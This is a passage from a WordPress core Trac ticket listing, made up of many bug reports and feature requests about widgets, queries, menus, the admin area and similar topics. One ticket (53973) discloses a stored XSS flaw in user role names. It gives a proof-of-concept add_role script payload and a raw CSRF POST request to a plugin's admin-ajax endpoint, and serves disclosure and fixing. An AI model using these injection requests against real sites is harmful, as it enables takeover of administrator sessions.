2. update your WordPress version from your site to version 5.2.1 3. Route to the dashboard, where you will see update button to version 5.2.1 4. Perform any operation like (user info, plugin page, widget page) it takes time to load and sometimes it throws ""connection time out"". **System Info:** System: Windows, Linux Browser: Chrome 74.0.3729.131 (Official Build) (64-bit) " kevintran094 Future Releases 16612 WordPress should return nocache headers for requests with comment cookies Comments normal normal enhancement new dev-feedback 2011-02-21T22:45:21Z 2019-06-04T19:22:17Z "Most themes, when displaying the comment form, change the HTML to pre-fill username, email address, and website when comment cookies are received in the HTTP request. Since the response does not have explicit nocache headers, per RFC2616 (http://www.ietf.org/rfc/rfc2616.txt) intermediate caches can use heuristics to determine the cache TTL for the response. Since there is 0 freshness data in the response, it is not really possible to perform good heuristics, but in practice, caches will assign a default TTL to this type of response. The result is that private information input by user A when submitting a comment can be returned to user B when making a request for the same URL. To protect ourselves against this, we should call nocache_headers() when comment cookies are sent and the comment form is being displayed. Alternatively, we can send nocache headers for all requests with comment cookies regardless of the comment form being displayed or not (probably easier and maybe safer). http://humboldtherald.wordpress.com/2011/01/27/gremlins/ is a story likely caused by an aggressive cache and the lack of nocache headers." barry Future Releases 15134 WordPress should not try to remove themes or plugins recursively if the directory is a symlink pbiron* Upgrade/Install normal normal Future Release defect (bug) accepted dev-feedback 2010-10-16T11:46:29Z 2023-07-05T18:13:59Z "Consider the situation: there is a server with multiple WordPress blogs hosted in it. Some plugins are common for all/many blogs and to save several (hundreds in our case) megs of the disk space, shared plugins are stored somehwere else (say, /var/www/wp-plugins) and there are symbolic links to /var/www/wp-plugins/ from /home//wp-content/plugins/. The onwer of the blog (user1) may not know these details and wants to update one of the plugins (plugin1) using automatic update feature. WordPress will then try to remove /home/user1/wp-content/plugins/plugin1/ recursively although /home/user1/wp-content/plugins/plugin1 is a symlink to /var/www/wp-plugins/plugin1. The obvious solution is to add a check to the filesystem classes that checks if the file is a symlink and if so, remove symlink with unlink() instead of trying to follow it and remove everything it sees. The advantage of this approach is that if the user symlinks a plugin to other user's data, those data will not be removed by WordPress (this can be very good for those hosts where all users are served by the same Apache user etc). " vladimir_kolesnikov Future Releases 56120 "WordPress should add a space character on every possible ""wrap point"" in a post title when building ""html title"", ""og:title"" and so on" Formatting normal normal Awaiting Review enhancement new dev-feedback 2022-07-01T05:13:27Z 2022-07-05T05:23:50Z "In WordPress it is possible to use html tags inside posts title. This is very nice: for example, it allows to use italics, and to make posts titles wrap where one wants. When the latter is the case, though, the titles get displayed good in the post, but not in the browser's window title (that usually the browser builds after the `Foobar` html entity), and not in the link previews that one can get by linking a post into a social network post (that usually have their title based on the `` entity). For example, a post title like `First line
second line
third line` will result in a `First linesecond linethird line` entity and in a `` entity, that will result in ugly and difficult to read browser window and link previews titles. This could be avoided by changing WordPress code so that it added a space character on every possible ""wrap point"" (`
`, `

`, `

` and so on) in a post title when building ""html titles"", ""og:title""s and the likes." pezcurrel Future Releases 43484 WordPress Notification Center proposal Users normal normal Awaiting Review feature request assigned dev-feedback 2018-03-07T11:48:10Z 2024-03-14T13:06:35Z "For a long time people have been suggesting / daydreaming / [https://twitter.com/Ipstenu/status/966411791134699520 wishing for] a unified notification center in WordPress. People expect it, the notification center has become a staple of almost all apps/sites that have a lot to keep track of - and WordPress definitely fits in that lineup. So there’s no reason not to add one to WordPress core too. This ticket aims to explore the details of such an implementation. I think clear limitations, a good backwards compatibility strategy and a strong UX are key to make this work for everyone. Key features: - One location for all notifications. - Easy to hook into, should work out of the box. - Flexible enough to be useful, limited enough to not get a circus. - Accessible from anywhere. - Accessible in the a11y sense. Here’s my first basic idea for notification properties, feel free to chime in: - A text field, limited to 280 characters, the length of a tweet. Probably wouldn’t want one notification to get so long that it fills up the whole visible sidebar. Links can be added to the text to trigger actions or visit pages, same as now basically. - A timestamp. - An icon. Could be the plugin icon, author avatar, or something like a category/message type, like info, warning, question, error, update, stuff like that, to visually distinguish notifications quickly. - A status, meaning read or unread basically. - Persist/show as toast. A suggestion by Joen Asmussen. Shows the notification outside the notification center for a set amount of time in a floating div. Similar to what Android/MacOS/Windows does when a notification comes in. Maybe only WordPress itself can throw notices like that. Probably not for MVP anyway. I created a quick interactive proof-of-concept in Sketch that you can view here. Desktop: https://sketch.cloud/s/AZz0M/all/notification-center/desktop/play Mobile: https://sketch.cloud/s/AZz0M/all/notification-center/iphone-8-plus/play Riad Benguella got excited by this idea and built a basic plugin to test it in your own WordPress install. https://github.com/youknowriad/newtify, and also a previous exploration at https://wordpress.org/plugins/wp-notification-center/. Developing this as a plugin is a great way to explore the best implementation, and any help is more than welcome. Some discussion points to get this started: - Can we agree on a set of notification properties that provide a consistent experience and that plugin authors can be happy with? - Which notification categories can we define, and should it only ever be possible to assign a category, or are plugin authors allowed to supply icons for their own notifications too? - How best to approach the backwards compatibility so we don’t break (all) existing admin notices? Can some type of conversion be made? - Is it enough to only show the notifications in the sidebar, or should there be a separate notifications page, maybe with filtering? (Probably not for MVP at least) - Are there any essential features missing from the list? " hedgefield Future Releases 58732 WordPress Gallery Block: Column Count Issue Results in Unbalanced Item Widths Editor 5.0 normal normal Awaiting Review enhancement new close 2023-07-06T13:13:40Z 2023-07-06T14:12:58Z "== Enhancement === Description The WordPress gallery block is currently experiencing an issue when users select a specific column count. The problem arises when attempting to achieve a balanced layout, as the items within the gallery block are not receiving a common width. This results in inconsistent and unbalanced item widths. Currently, there is an option to keep all the items in the same width. === Environment - WordPress: 6.3-beta3-56143 - PHP: 7.4.33 - Server: TasteWP-S1 Official/3.0.0 - Database: mysqli (Server: 8.0.32-0ubuntu0.20.04.2 / Client: mysqlnd 7.4.33) - Browser: Chrome 112.0.0.0 (macOS) - Theme: Twenty Twenty-Three 1.1 - MU-Plugins: None activated - Plugins: * WordPress Beta Tester 3.5.0 === Steps to Reproduce 1. Add a gallery block 2. Add a few images to the gallery 3. Change the number of columns option === Expected Results 1. Same column size for all gallery items === Actual Results 1. If there are 6 gallery items and the column count is 4 the last 2 items are showing as 2 columns instead of 4." sarath.ar Future Releases 22279 WordPress Export/Import deletes carriage returns Export 3.4.2 normal normal defect (bug) new dev-feedback 2012-10-25T20:02:42Z 2019-06-04T19:44:09Z "WordPress export does not translate or escape bare CR characters in a CR/LF pair. They show up unfiltered in the WXR export file. I see this both in post_content and in strings that were serialized into a post_meta field. The CR characters are in the WXR file, unfiltered. Then, WordPress import loses these CR characters. They are simply erased. It may be because SimpleXMLParser can't or won't open the XML file in binary mode, so line ending translation can & does happen. That's just a theory, but if it's true then this behavior might *not* happen on all platforms or with all PHP versions. (I'm seeing this on OS X 10.6.8, PHP 5.4.4.) In the worse case -- mine -- the munged string is a small component of a complex datastructure that is serialized in a postmeta record. In this case, the entire meta_value field is deleted on import, because the data won't unserialize, because its length has changed. It seems to me that WP Export should escape any character that might be threatened in transit. I'm no XML lawyer, but some sources claim that unescaped CR characters are invalid XML. To reproduce: * store a carriage return in a post. * export it to a WXR file. * examine the WXR file for the raw carriage return (`^M`). * import that file. * search for the carriage return." mykle Future Releases 34657 WordPress doesn't set object terms for menu items so pending items not working Menus 4.3.1 normal normal defect (bug) new dev-feedback 2015-11-11T11:23:11Z 2019-06-04T20:17:50Z " When I create menu items and refresh admin page without saving menu, wordpress can not show pending menu items. At line 1127 of 'wp-admin/includes/ajax-functions.php' file there is wp_save_nav_menu_items function, the first argument for this function '''is always zero''', so At line 441 of 'wp-includes/nav-menu.php' file wp_set_object_terms function doesn't work. I add my menu id to {{{ $item_ids = wp_save_nav_menu_items( 97, $menu_items_data ); }}} function, and it working for me. :)" rss_samuel Future Releases 46582 WordPress Core Updates: 'Last updated' date not showing correctly Upgrade/Install 5.1 normal normal Awaiting Review defect (bug) new dev-feedback 2019-03-21T06:44:12Z 2019-03-21T10:33:52Z "For the WordPress Core Updates the date for last search is constantly showing January 1st 1970. My WordPress version is 5.1.1 in Development Mode." markustippner Future Releases 44965 WordPress Core strips $_GET['error'] occasionally SergeyBiryukov* Query normal normal Future Release defect (bug) accepted dev-feedback 2018-09-19T13:30:20Z 2022-09-21T09:08:29Z "I have a plugin that is an OAuth2 consumer for integrating with Stripe Connect. I created a new custom endpoint by adding a query var, and a rewrite rule, so everything that lands on `/stripe_connect` will get dealt with by my plugin's code. If user denies the connection request at Stripe, they are redirected back to my site with roughly the following URL params in tow: `/stripe_connect?state=3__5e4e4d4c9df8e6948a33fdfb44f75c0f&error=access_denied&error_description=The+user+denied+your+request` * `state` is a custom param I set that gets replayed to me * `error` is `access_denied`, which is the standard that Stripe will do in this case, see https://stripe.com/docs/connect/oauth-reference#get-authorize-errors * `error_description` is a human readable problem However in `parse_request`, a variable by the name of `$error` gets set to `404` at the beginning, and as it matches the rules, if it's still 404 (ie no other error popped up, it will then unset `$_GET['error']`. Link to code: https://core.trac.wordpress.org/browser/trunk/src/wp-includes/class-wp.php#L260 Which is something I'd actually need to deal with. Currently the way to get around it is to use `$_REQUEST` instead of `$_GET`, however `$_REQUEST` also has POST variables in it, so I can't make sure that the `error` I'm getting is actually due to a query param. I also haven't found a ticket that had this listed as a problem. What was the reasoning for unsetting that $_GET var? I see that they were added originally in [1570] (14 years ago), however is that still a valid reason?" javorszky Future Releases 60558 WordPress Core CSS produces error in NU HTML Checker Editor 6.4.3 normal normal Awaiting Review defect (bug) new close 2024-02-16T08:19:09Z 2024-02-16T10:12:52Z "The WordPress Default Block Library file Produces these types of errors in NU HTML Checker. File Path: /wp-includes/css/dist/block-library/style.min.css I am attaching the screenshot for you to look over. Screenshot URL: https://share.cleanshot.com/XTb38NMBGlQPPwCGTqYS" umang7 Future Releases 46243 WordPress Comments Core Query Comments 5.0.3 normal normal Awaiting Review defect (bug) new dev-feedback 2019-02-13T03:48:45Z 2021-03-26T16:16:24Z "Hello, **Issue:** We have over 400K+ posts and I saw this slow query on any WordPress area on each page. We had 2M+ comments. **Question:** This Query is working on all pages on Dashboard or Settings, Plugin section and any sections why does it? It should works on only all Posts list? **Solution:** I have noticed that Header Bar has Comments Icon and that has displayed the Pending Comments count. I have tried to disable it via custom Filter for following. {{{ function admin_bar_remove_comments(){ global $wp_admin_bar; $wp_admin_bar->remove_menu('comments'); } add_action( 'wp_before_admin_bar_render', 'admin_bar_remove_comments' ); }}} **Slow Query:** {{{ SELECT comment_approved, COUNT( * ) AS total FROM wp_comments GROUP BY comment_approved }}} **Environment Information:** WP Version 5.0.3 (also tested 4.9.8) Theme: Twenty Seventeen (other themes) Plugins: Query Monitor Thanks." Uranbold Future Releases 42455 WordPress Class methods and Single Responsibility (recent posts widgets) Widgets 4.9.8 normal normal Awaiting Review enhancement new dev-feedback 2017-11-07T13:24:34Z 2022-09-22T09:16:05Z "WordPress uses PHP Classes a lot and this is great for extending and improving. The problem is, many class methods does a lot of things at once and this doesn't help extending at all. For instance, I'm trying to extend the Recent Posts Widget (`WP_Widget_Recent_Posts`). The plugin has it's internal settings and logic, query posts and apply filters. I want to change it's render method, but just that. Don't want to mess with the plugin logic. The problem is, the render method (`widget` method) does a lot of things instead of focusing only on rendering. This forces me to copy every logical actions and reproduce them on my extending class. This could be solved by just splitting the plugin logic and rendering in separated functions (an function to get the posts and filters, separated from the `widget` function). This would improve a lot the WordPress extending by plugins and themes. If we apply the single responsibility principle on WordPress classes and functions, plugins wouldn't need to have much more code. Another point: this enhancement wouldn't impact old plugins/themes if the functions signatures keep the same." viewup Future Releases 35774 WordPress admin structure SergeyBiryukov Administration normal normal Future Release enhancement assigned dev-feedback 2016-02-08T13:29:06Z 2019-09-23T01:38:27Z "Currently the admin titles has a wired structure. Few examples: * **Dashboard ‹ Site Name — WordPress** * **Posts ‹ Site Name — WordPress** * **Writing Settings ‹ Site Name — WordPress** Same structure applies for plugin setting pages. * `page-title ‹ site-name — WordPress` The problem with this structure: * Why are we using `‹` character? why not `›`. * We should add RTL support for the separator. * The `Site Name` and the `WordPress`, they look like bad combination. Few suggestions: * We need to replace the `‹` character with `›`. * We can add RTL support. See ticket #35737 and changeset [36487]. * And we need to think about the combination of `WordPress` and `Site Name`." ramiy Future Releases 53973 WordPress <= 5.8 - Authenticated Persistent XSS (User role name) Security normal normal Awaiting Review defect (bug) new dev-feedback 2021-08-21T01:03:21Z 2022-12-23T12:29:58Z "Hi there, First of all, I need to mention this (as requested by @ehtis / H1): >When creating the ticket, please mention in it that the security team has evaluated this and asked you to open a public ticket for discussion. \\ == Intro: In versions of WordPress, including the latest v5.8, it's possible to inject malicious JavaScript code in the name (`$display_name`, `$details['name']`) of any user role. This vulnerability could be used to infect a website with malicious code or to keep a backdoor for future exploitations. Not all security plugins will detect such injections, cause adding or editing any user role is a legitimate process and all data is stored in the DB. Important to note that the functionality of adding custom roles is available in many plugins and themes, some of which aren't properly protected from CSRF attacks. Given this vulnerability, such attack vectors can be combined to successfully compromise a website. \\ == Impact: Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. \\ == Steps To Reproduce: 1. Use attached PoC plugin (this is the fastest way to reproduce the JS injection) or use this code in any PHP file on your WordPress website: {{{ #!php add_role( 'hacker', __( 'Hacker<script>alert(`Visse`);</script>' ), array( 'read' => true, 'edit_posts' => true ) ); }}} 2. Activate the plugin (you can turn it off right away cause we don't need it anymore - our custom user role will be already injected). Our new role will appear in the database like this: {{{ s:5:""hacker"";a:2:{s:4:""name"";s:37:""Hacker<script>alert(`Visse`);</script>"";s:12:""capabilities"";a:2:{s:4:""read"";b:1;s:10:""edit_posts"";b:1;}} }}} 3. After that injected payload will be triggered on many pages inside the dashboard, f.e.: /wp-admin/users.php | /wp-admin/profile.php | /wp-admin/options-general.php etc. In my PoC plugin there will be a simple alert window. \\ == Additional Information: Another way to add custom user role is by using plugin, f.e. '''uListing''' [https://ru.wordpress.org/plugins/ulisting/ulisting.2.0.4.1.zip v2.0.4.1] (CSRF scenario): {{{ POST /wp-admin/admin-ajax.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 925 action=stm_save_user_roles&roles%5B0%5D%5Bis_delete%5D=0&roles%5B0%5D%5Bname%5D=Visse%3Cscript%3Ealert(%2FVisse%2F)%3B%3C%2Fscript%3E&roles%5B0%5D%5Bslug%5D=visse&roles%5B0%5D%5Bcapabilities%5D%5Bdefault%5D=1&roles%5B0%5D%5Bcapabilities%5D%5Blisting_limit%5D=1553&roles%5B0%5D%5Bcapabilities%5D%5Blisting_moderation%5D=1&roles%5B0%5D%5Bcapabilities%5D%5Bstm_listing_role%5D=1&roles%5B0%5D%5Bcapabilities%5D%5Ballow_delete_listings%5D=0&roles%5B0%5D%5Bcapabilities%5D%5Bcomment%5D=1&roles%5B1%5D%5Bis_delete%5D=0&roles%5B1%5D%5Bname%5D=Hacker%3Cscript%3Ealert(%2FHacker%2F)%3B%3C%2Fscript%3E&roles%5B1%5D%5Bslug%5D=hacker&roles%5B1%5D%5Bcapabilities%5D%5Bdefault%5D=1&roles%5B1%5D%5Bcapabilities%5D%5Blisting_limit%5D=1337&roles%5B1%5D%5Bcapabilities%5D%5Bcomment%5D=1&roles%5B1%5D%5Bcapabilities%5D%5Blisting_moderation%5D=0&roles%5B1%5D%5Bcapabilities%5D%5Bstm_listing_role%5D=1&roles%5B1%5D%5Bcapabilities%5D%5Bis_open%5D=1 }}} \\ == Possible solution: File: /wp-includes/class-wp-roles.php, line 162: `'name' => $display_name,` change to `'name' => strip_tags( $display_name ),`. \\" visse Future Releases 50909 WordPress 5.5 update adds height and width attributes to images Media 5.5 normal normal Awaiting Review defect (bug) new close 2020-08-11T22:02:56Z 2020-10-30T14:33:28Z "It appears that some images added with the gutenberg editor (no updates since June) now have height and width attributes being dynamically added following the new loading attribute. I updated locally only so far. This is the previous img element being displayed in the browser: {{{ <img src=""https://www.brothersmoving.local/wp-content/uploads/2020/06/AdobeStock_230714251_Preview.jpeg"" alt=""Adobestock 230714251 Preview"" class=""wp-image-8050"" srcset=""https://staging.brothersmoving.ca/wp-content/uploads/2020/06/AdobeStock_230714251_Preview.jpeg 1000w, https://staging.brothersmoving.ca/wp-content/uploads/2020/06/AdobeStock_230714251_Preview-300x134.jpeg 300w, https://staging.brothersmoving.ca/wp-content/uploads/2020/06/AdobeStock_230714251_Preview-768x344.jpeg 768w"" sizes=""(max-width: 1000px) 100vw, 1000px""> }}} This is it now: {{{ <img loading=""lazy"" width=""1000"" height=""448"" src=""https://www.brothersmoving.local/wp-content/uploads/2020/06/AdobeStock_230714251_Preview.jpeg"" alt=""Adobestock 230714251 Preview"" class=""wp-image-8050"" srcset=""https://www.brothersmoving.local/wp-content/uploads/2020/06/AdobeStock_230714251_Preview.jpeg 1000w, https://www.brothersmoving.local/wp-content/uploads/2020/06/AdobeStock_230714251_Preview-300x134.jpeg 300w, https://www.brothersmoving.local/wp-content/uploads/2020/06/AdobeStock_230714251_Preview-768x344.jpeg 768w"" sizes=""(max-width: 1000px) 100vw, 1000px""> }}} These are the new attributes being added: {{{ loading=""lazy"" width=""1000"" height=""448"" }}} " jeslen Future Releases 51158 "With ACF Blocks in 5.5, ""enqueue_assets"" causes fatal error" Editor 5.5 normal blocker Awaiting Review defect (bug) new dev-feedback 2020-08-27T15:20:27Z 2020-09-03T00:49:09Z "This is related to ACF Pro, but didn't happen until the upgrade to WP 5.5. I downgraded to 5.4.2 to make sure and I can verify it's a WordPress issue, likely related to REACT or the Rest API. I don't know enough about the Gutenberg editor to know if it's specific to that, so I'm posting here with ""second-opinion"" Workflow Keyword. I have several custom blocks created using ACF Pro. One of them requires multiple javascript files and uses the ""enqueue_assets"" attribute to enqueue them. When I try to edit any post, I get a popup error that covers the entire screen saying ""The editor has encountered an unexpected error."" and has 3 buttons: ""Attempt Recovery"", ""Copy Post Text"", ""Copy Error"". None of the buttons work. In the console, I get these errors: {{{ react-dom.min.js?ver=16.9.0:103 TypeError: First argument must be a String, HTMLElement, HTMLCollection, or NodeList at t.exports (compose.min.js?ver=c4775e2aa9288586791e26a980eff851:9) at e.value (compose.min.js?ver=c4775e2aa9288586791e26a980eff851:9) at new e (compose.min.js?ver=c4775e2aa9288586791e26a980eff851:9) at compose.min.js?ver=c4775e2aa9288586791e26a980eff851:9 at Vb (react-dom.min.js?ver=16.9.0:104) at Xi (react-dom.min.js?ver=16.9.0:151) at unstable_runWithPriority (react.min.js?ver=16.9.0:26) at Ma (react-dom.min.js?ver=16.9.0:52) at Yb (react-dom.min.js?ver=16.9.0:150) at O (react-dom.min.js?ver=16.9.0:120) components-1480.js:24 Uncaught TypeError: Cannot read property 'clientHeight' of null at G.hasOverflowedContent (components-1480.js:24) at G.fitTitle (components-1480.js:24) at components-1480.js:24 }}} After the second error, the first error repeats and keeps getting hit every few milliseconds, telling me it has thousands of times within a minute. I'll post this with ACF Pro, too, but wanted to mention here in case it's a WordPress bug. I don't know how many people use ACF blocks in the Block Editor, but it completely prevents people from editing posts if they have some. Thanks!" bronsonoquinn Future Releases 33180 Widgets not preserved after switching theme and deactivate plugins Widgets 2.8 normal normal defect (bug) new dev-feedback 2015-07-29T17:59:40Z 2019-06-05T06:41:16Z "Steps to reproduce: - Activate any plugin with available widget. - Use this widget in sidebar of actual theme. - Deactivate all plugins. - Switch theme (for example Twenty Fifteen). Note: These steps are frequently used for debugging problems. - Switch back to previous theme. - Activate all plugins. Expected result: Widget is still active and visible. Current result: Widget is missing. When used together with any core widget, then this widget is preserved during workflow above." pavelevap Future Releases 29790 Widgets don't know the widget area context they're in Widgets normal normal enhancement new dev-feedback 2014-09-29T12:44:45Z 2019-06-05T06:40:16Z "If you have a widget in a widget area (both on the admin side and front-end side) it does not know in which widget area it is in. Use cases for this would be: - custom filtering and/or styling on the front-end of a widget based on its location. - having some editor options turned on/off based on widget-area." ruud@… Future Releases 18446 Widget removes fields w/ default HTML on initial save in IE8 and 9 Widgets 3.2.1 normal normal defect (bug) new dev-feedback 2011-08-16T15:51:02Z 2019-06-05T06:38:17Z "Weird problem, testd in IE8/9, Chrome, and Firefox. If you have a widget, with HTML in the default value, IE8/9 will remove the field entirely. However, if you then paste the HTML back into the field and save, it works fine. This ONLY happens after the initial drag/drop then save of the widget. It even happens if you drag/drop the widget, change the field and click save. Example Plugin: http://wordpress.org/extend/plugins/ft-calendar/ Widget: Upcoming Events Widget The Event Template (event_template) is set by default to: {{{ <a href=""%URL"">%TITLE%</a> }}} The event_template source for the Available Widget is: {{{ <input type=""text"" value=""<a href="%URL%">%TITLE% (%TIME%)</a>"" name=""widget-ft_cal_event_list[__i__][event_template]"" id=""widget-ft_cal_event_list-__i__-event_template"" class=""widefat"" /> }}} The event_template source for the widget after it is dragged to a widget area is: {{{ <input type=""text"" value=""<a href="%URL%">%TITLE% (%TIME%)</a>"" name=""widget-ft_cal_event_list[8][event_template]"" id=""widget-ft_cal_event_list-8-event_template"" class=""widefat"" /> }}} The source for the widget after it is first saved is: {{{ <input type=""text"" value=""<a href="%URL%">%TITLE% (%TIME%)</a>"" name=""widget-ft_cal_event_list[8][event_template]"" id=""widget-ft_cal_event_list-8-event_template"" class=""widefat"" /> }}} I setup a test to output $new_instance and $old_instance during the ""update"" process. Step 1: Moving widget from Available Widgets to Widget Area (in IE): {{{ NEW INSTANCE: Array ( [title] => [date] => [number_of] => 1 [date_types] => Month [limit] => 0 [timeformat] => g:i a [dateformat] => jS [date_template] => %DATE% [monthformat] => F Y [month_template] => %MONTH% ) OLD INSTANCE: Array ( ) }}} Step 2: Saving widget in Widget Area: {{{ NEW INSTANCE: Array ( [title] => [date] => [number_of] => 1 [date_types] => Month [limit] => 0 [timeformat] => g:i a [dateformat] => jS [date_template] => %DATE% [monthformat] => F Y [month_template] => %MONTH% ) OLD INSTANCE: Array ( [title] => [show_rss_feed] => off [show_ical_feed] => off [date] => [span] => +1 Month [number_of] => 1 [date_types] => Month [calendars] => [limit] => 0 [dateformat] => jS [timeformat] => g:i a [monthformat] => F Y [event_template] => [date_template] => %DATE% [month_template] => %MONTH% [hide_duplicates] => ) }}} Step 3: Pasting HTML code back into Event Template and saving Widget: {{{ NEW INSTANCE: Array ( [title] => [date] => [number_of] => 1 [date_types] => Month [limit] => 0 [timeformat] => g:i a [dateformat] => jS [date_template] => %DATE% [monthformat] => F Y [month_template] => %MONTH% [event_template] => <a href=""%URL%"">%TITLE% (%TIME%)</a> ) OLD INSTANCE: Array ( [title] => [show_rss_feed] => off [show_ical_feed] => off [date] => [span] => +1 Month [number_of] => 1 [date_types] => Month [calendars] => [limit] => 0 [dateformat] => jS [timeformat] => g:i a [monthformat] => F Y [event_template] => [date_template] => %DATE% [month_template] => %MONTH% [hide_duplicates] => ) }}} Here is a screenr showing the problem not working in IE9 and working in Chrome: http://www.screenr.com/mkhs " layotte Future Releases 45054 "Widget deletion: Add an ""Are you sure you want to delete?"" popup before it gets deleted" Widgets 4.9.8 normal normal Awaiting Review enhancement new dev-feedback 2018-10-05T10:24:33Z 2020-05-25T18:16:56Z "For the widgets the ""Delete"" and ""Done"" buttons are close to each other, and if you accidentally click Delete, there is no obvious option to restore the widget. Not great if you have added lots of html code... I would have liked to see here a ""Are you sure you want to delete this widget?"". " Vibeque Future Releases 46082 Why returning $menu_array[x] instead of $title Administration normal normal Awaiting Review enhancement new dev-feedback 2019-01-23T16:02:40Z 2021-12-08T12:38:49Z " {{{ File: wp-admin/includes/plugin.php Function: get_admin_page_title() }}} In lines `1613, 1616, 1637, 1645 and 1660` the following pattern of assignments and return the value are used: {{{ $title = $menu_array[x]; return $menu_array[x]; }}} where `$tile` is `global`. What is the difference between the following returning patterns {{{ $title = $menu_array[x]; return $menu_array[x]; }}} AND {{{ $title = $menu_array[x]; return $title; }}} Since we are already updating the the global variable `$title` with that of `$menu_array[x]`, why can't we just return `$title` instead of `$menu_array[x]`? For every single request `global $title` will receive a new value. In `line 1620` the return pattern is usual: {{{ $title = $menu_array[0]; return $title; }}} " subrataemfluence Future Releases 49059 Whitespace inside p element in wp-signup.php should be removed Networks and Sites 3.0 normal normal Future Release enhancement assigned dev-feedback 2019-12-21T14:49:34Z 2020-02-11T15:32:03Z "In wp-signup.php there is a paragraph of text with a lot of left and right whitespace. {{{ <p> Welcome back, Peter. By filling out the form below, you can <strong>add another site to your account</strong>. There is no limit to the number of sites you can have, so create to your heart's content, but write responsibly!. </p> }}} We should remove the whitespace because it isn't necessary." henry.wright Future Releases 58497 when the content of a page is structured into two columns, it causes the menu bar background to change unexpectedly. Bundled Theme 6.2.2 normal normal Awaiting Review defect (bug) new dev-feedback 2023-06-08T23:27:10Z 2024-02-01T09:31:25Z "Not sure how to put this one in to words. 1. I have a nav bar at the top of twenty twenty three. Background color is set works fine. 2. yesterday I tried out adding a two column block in a page content area on edit page. (Still learning the new flow. getting better at it but still a learning curve). 3. about half of the nav bar on these pages with columns in the content area turns white. Not all of the nave bar, but half. 4. Confused me and looked for css solution before realizing it was the same template working fine on other pages and then realized it was the column. 5. Removing the column from the page content area fixes the issue. " noelhefele Future Releases 50871 When exact is true and orderby set to relevance, there is a DB error on search results page Query normal normal Awaiting Review defect (bug) new dev-feedback 2020-08-06T20:21:56Z 2020-08-07T16:18:15Z "In search query, when `exact` is set to `true` and `orderby` set to `relevance` there is DB error WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'DESC, wp_posts.post_date DESC LIMIT 0, 10' at line 1] `SELECT SQL_CALC_FOUND_ROWS wp_posts.ID FROM wp_posts WHERE 1=1 AND (((wp_posts.post_title LIKE 'hello') OR (wp_posts.post_excerpt LIKE 'hello') OR (wp_posts.post_content LIKE 'hello'))) AND wp_posts.post_type IN ('post', 'page', 'attachment') AND (wp_posts.post_status = 'publish' OR wp_posts.post_author = 1 AND wp_posts.post_status = 'private') ORDER BY DESC, wp_posts.post_date DESC LIMIT 0, 10` It is clear that both options together has no meaning. But it is compatibility issue between [https://wordpress.org/plugins/wp-extended-search/ WP Extended Search] and [https://wordpress.org/plugins/woocommerce/ WooCommerce] WP Extended search has a feature to match exact sentence so it sets `exact` to `true` and later WooCommerce adds `orderby => relevance` causing this SQL error. === How to reproduce with just WP * Add this code to theme or plugin {{{#!php <?php add_action('pre_get_posts', function ( $query ){ $query->set( 'exact', true ); $query->set( 'orderby', 'relevance' ); $query->set( 'order', 'DESC' ); }); }}} * Go to front-end and make a search, you will see the error. === Proposed fix Here https://core.trac.wordpress.org/browser/tags/5.4.2/src/wp-includes/class-wp-query.php#L2357 We checking if `! empty( $q['search_orderby_title'] )` is not empty but we allow to call `parse_search_order()` when `'relevance' === $q['orderby']` causing `ORDER BY DESC` in SQL query without column name. IMHO, we should not call `parse_search_order()` when `search_orderby_title` is empty regardless of `orderby`." 5um17 Future Releases 15953 when category slug is changed, old uri also should redirect to new, as post uris do SergeyBiryukov Permalinks normal normal Future Release feature request reviewing dev-feedback 2010-12-22T18:51:10Z 2023-05-25T14:45:21Z when category slug is changed, old uri also should redirect to new, as post uris do qdinar Future Releases 44596 Welcome page text is repetitive Upgrade/Install normal normal Future Release defect (bug) new dev-feedback 2018-07-17T14:15:03Z 2019-02-01T16:29:25Z "Right now, the WordPress ""Welcome"" page/tab currently repeats nearly the same text 7 times in a row. The pattern is basically: `Version %number% addressed %number% bugs. For more information, see %link%.` The repetition is exacerbated by there being 7 minor releases in the 4.9 major branch, but considering this page is the first thing people see after upgrading, I think this can be communicated better. Screenshot imminent." johnjamesjacoby Future Releases 59027 Weekly wp_get_archives has invalid link (link for month instead of year) Posts, Post Types 0.71 normal normal 6.6 defect (bug) new needs-unit-tests 2023-08-09T13:43:54Z 2024-02-05T20:34:38Z "If you call `wp_get_archives` function with `type` set to weekly, the resulted link contains two parameters: m => year, w => week. This results in unwanted behaviour, as you get a month like `2023` which is invalid. The link should contain ?y={year}&w={week}. " filipac Future Releases 33837 We should avoid Superglobals when possible wonderboymusic General normal normal enhancement assigned dev-feedback 2015-09-11T19:53:44Z 2019-06-04T19:51:22Z "We can probably add some helper functions that complete common tasks around Superglobal access Examples of accessing here: https://codeclimate.com/github/WordPress/WordPress/wp-admin/edit-comments.php Something like `wp_verify_action( $action )` could replace the many instances of things like: `isset( $_REQUEST['action'] ) && 'upload-attachment' == $_REQUEST['action']` Without having to architect something like `Symfony/HttpFoundation`, we can make accessing them more rare." wonderboymusic Future Releases 16443 We need a way to programmatically tell if we are in a sidebar Widgets 2.2 normal normal Awaiting Review feature request new dev-feedback 2011-02-02T20:10:28Z 2022-07-15T16:12:27Z There is currently no way to tell if you are in_a_sidebar or doing a widget which makes me a sad stallman lookalike. jorbin Future Releases 51702 Warn of potentially poor/insecure password generation Site Health normal normal Awaiting Review feature request new dev-feedback 2020-11-03T20:28:34Z 2021-06-01T13:48:56Z "`wp_generate_password()` is responsible for generating random strings for many things in core. To name a few, [https://core.trac.wordpress.org/browser/trunk/src/wp-includes/class-wp-application-passwords.php?rev=49490#L49 Application Passwords], [https://core.trac.wordpress.org/browser/trunk/src/wp-admin/setup-config.php?rev=49490#L324 Core salts] (as a fallback), [https://core.trac.wordpress.org/browser/trunk/src/wp-admin/includes/privacy-tools.php?rev=49490#L335 random file names] (Privacy), default user passwords, and more. Each scenario passes the length of the desired generated string, and whether to include 2 different sets of special characters. In addition to being fully pluggable, there is a `random_password` filter within `wp_generate_password()` that can alter the result of the generated password. The `$length` field should always be respected and `wp_generate_password()` should never return a string shorter than requested. If this does happen, the user should be made aware that potentially insecure strings are being generated so that they can attempt to fix this." desrosj Future Releases 28801 Walker::walk makes an incorrect assumption if $top_level_elements is empty. General 3.8 normal normal defect (bug) new needs-unit-tests 2014-07-09T16:02:56Z 2019-06-04T19:46:05Z "A colleague of mine was generating a sidebar sub-navigation for one of his projects. The 